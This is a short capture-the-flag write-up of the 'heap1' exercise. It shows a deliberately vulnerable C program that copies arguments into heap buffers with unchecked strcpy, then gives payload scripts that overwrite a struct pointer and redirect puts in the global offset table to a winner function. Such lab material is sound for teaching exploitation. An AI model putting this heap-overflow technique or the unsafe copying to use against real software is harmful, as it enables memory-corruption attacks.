# heap1

## Source code

```
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct internet {
  int priority;
  char *name;
};

void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;

  i1 = malloc(sizeof(struct internet));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}
```

## Challenge

In this challenge we again need to call winner function, this program takes two inputs copies them to two buffers on heap of which address are stored in `struct internet` so we can overwrite `puts` function in global offset table to point `puts` after finding position of puts in global offset table

![](images/heap1_0.png)

so writing our two payloads as

```
#!/usr/bin/env python

import struct
padding = 'AAAABBBBCCCCDDDDEEEE'
address_to_write = struct.pack('<I',0x08049774)
print padding+address_to_write
```

```
python -c 'import struct; print struct.pack("<I",0x8048494)'
```

so running our payload

![](images/heap1_1.png)